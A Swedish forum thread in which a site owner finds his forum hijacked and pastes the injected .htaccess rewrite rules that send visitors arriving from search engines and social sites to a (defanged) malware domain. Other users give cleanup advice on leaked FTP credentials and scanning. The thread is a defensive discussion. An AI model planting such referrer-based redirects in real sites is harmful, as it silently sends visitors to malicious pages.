[BarateaU]

Kom hem från sol och bad och möttes av massa fina meddelanden om "hijack" på mitt forum.
Försöker hitta tänkar elak kod men ser ingen röd tråd.

Trycker jag på "nya inlägg"
http://www.mobilabredband.se/forum/s...on=show_recent

Så skickas man ibland hit:
hxxp:/ /onmouseout-divstyle.ru/vis/index.php?action=show_recent

Vilket är någon trevlig virussida.

Sneglar jag på koden så ser det ut som detta.
<a href="http://www.mobilabredband.se/forum/viewtopic.php?id=4016&amp;action=new" title="Gå till det första nya inlägget sen ditt senaste besök.">Nya inlägg</a>

Vad kan då detta betyda, att de har ändrat något i databas strukturen eller html koden?

[BarateaU]

Hittade detta fina i min .htaccess fil bland annat

Kod:

<IfModule mod_rewrite.c>																														

																														RewriteEngine On																														

																														RewriteCond %{HTTP_REFERER} ^.*(google|ask|yahoo|baidu|youtube|wikipedia|qq|excite|altavista|msn|netscape|aol|hotbot|goto|infoseek|mamma|alltheweb|lycos|search|metacrawler|bing|dogpile|facebook|twitter|blog|live|myspace|mail|yandex|rambler|ya|aport|linkedin|flickr|nigma|liveinternet|vkontakte|webalta|filesearch|yell|openstat|metabot|nol9|zoneru|km|gigablast|entireweb|amfibi|dmoz|yippy|search|walhello|webcrawler|jayde|findwhat|teoma|euroseek|wisenut|about|thunderstone|ixquick|terra|lookle|metaeureka|searchspot|slider|topseven|allthesites|libero|clickey|galaxy|brainysearch|pocketflier|verygoodsearch|bellnet|freenet|fireball|flemiro|suchbot|acoon|cyber-content|devaro|fastbot|netzindex|abacho|allesklar|suchnase|schnellsuche|sharelook|sucharchiv|suchbiene|suchmaschine|web-archiv)\.(.*)																														

																														RewriteRule ^(.*)$ hxxp: / / onmouseout-divstyle.ru/vis/index.php [R=301,L]																														

																														RewriteCond %{HTTP_REFERER} ^.*(web|websuche|witch|wolong|oekoportal|t-online|freenet|arcor|alexana|tiscali|kataweb|orange|voila|sfr|startpagina|kpnvandaag|ilse|wanadoo|telfort|hispavista|passagen|spray|eniro|telia|bluewin|sympatico|nlsearch|atsearch|klammeraffe|sharelook|suchknecht|ebay|abizdirectory|alltheuk|bhanvad|daffodil|click4choice|exalead|findelio|gasta|gimpsy|globalsearchdirectory|hotfrog|jobrapido|kingdomseek|mojeek|searchers|simplyhired|splut|the-arena|thisisouryear|ukkey|uwe|friendsreunited|jaan|qp|rtl|search-belgium|apollo7|bricabrac|findloo|kobala|limier|express|bestireland|browseireland|finditireland|iesearch|ireland-information|kompass|startsiden|confex|finnalle|gulesider|keyweb|finnfirma|kvasir|savio|sol|startsiden|allpages|america|botw|chapu|claymont|clickz|clush|ehow|findhow|icq|goo|westaustraliaonline)\.(.*)																														

																														RewriteRule ^(.*)$ hxxp: / /onmouseout-divstyle.ru/vis/index.php [R=301,L]																														

																														</IfModule>

[foks]

Glöm inte att kolla hur .htaccessfilen ändrats. Notera tiden för när filen ändrades och jämför med accessloggarna. Hittar du ingenting där kan intrånget ha skett via FTP.

[foks]

Update: Jag anar att du själv administrerar den här servern och det inte är ett webbhotellskont. Notera att även andra domäner på servern är drabbade, se http://sakrare.ikyon.se/?ip=188.95.227.20. Det är jag som driver den här sidan, attacken mot det här ip-numret upptäcktes i tisdags men på grund av lite krångel hos mig har de här rapporterna inte kommit iväg förrän nu.

[b_andersson]

Installera och kör dessa för att kolla så du inte har ngt rootkit eller liknande som ligger kvar:

http://www.rootkit.nl/projects/rootkit_hunter.html
http://www.rfxn.com/projects/linux-malware-detect/

[BarateaU]

Servern är citynetworks shared hosting

[BarateaU]

Citat:

Ursprungligen postat av foks

Glöm inte att kolla hur .htaccessfilen ändrats. Notera tiden för när filen ändrades och jämför med accessloggarna. Hittar du ingenting där kan intrånget ha skett via FTP.

Tyvärr har de bara access loggar från http och ej ftp.

Citat:

Ursprungligen postat av foks

Update: Jag anar att du själv administrerar den här servern och det inte är ett webbhotellskont. Notera att även andra domäner på servern är drabbade, se http://sakrare.ikyon.se/?ip=188.95.227.20. Det är jag som driver den här sidan, attacken mot det här ip-numret upptäcktes i tisdags men på grund av lite krångel hos mig har de här rapporterna inte kommit iväg förrän nu.

Många av de sidorna är mina förutom 1, så kanske inte är kopplat till mig direkt utan nått med servern.

Citat:

Ursprungligen postat av b_andersson

Installera och kör dessa för att kolla så du inte har ngt rootkit eller liknande som ligger kvar:

http://www.rootkit.nl/projects/rootkit_hunter.html
http://www.rfxn.com/projects/linux-malware-detect/

Måste ringa CN och höra vad som händer, efter jag fixade .htacessen igår så är den tillbaka till hijack idag.
Har bytt ftp konton nu också, får se om de hjälper lite.

[gregoff]

Håll gärna tråden uppdaterad om vad som var orsaken när du/ni vet. Skulle vara intressant att veta vad man kanske inte tänker på själv.

Var med om något liknande tidigare på en tidigare arbetsplats. Där var problemet att ftp-lösen hade läckt ut från kunden själv.

[AndreasS]

Det där har jag sett på flera kunders konton tidigare hos oss. Det som verkar ske är att FTP-lösenordet kommer ut (vanligen genom virus på datorn eller i samma nätverk som FTP-anslutningarna görs från). Sen brukar något kolla igenom kontot efter .htaccess-filer, ta ner dessa, lägga till redirects som kollar efter browser, vilken väg de kom in (referrer osv) och sen skicka vidare till antingen reklam eller virussidor.

Enda åtgärden vi har behövt göra i dessa fall är att meddela kunden, byta lösenord på FTP och be kunden köra en komplett virusscanning, det har löst alla ärenden jag kan minnas hittills.

[BarateaU]

Har pratat med CN och de lät inte som jag var ensam om att ha anmält detta.
Men får se om det är knytet till mitt ftp konto enskilt eller vad det beror på.
Skall försöka rensa upp bäst jag kan nu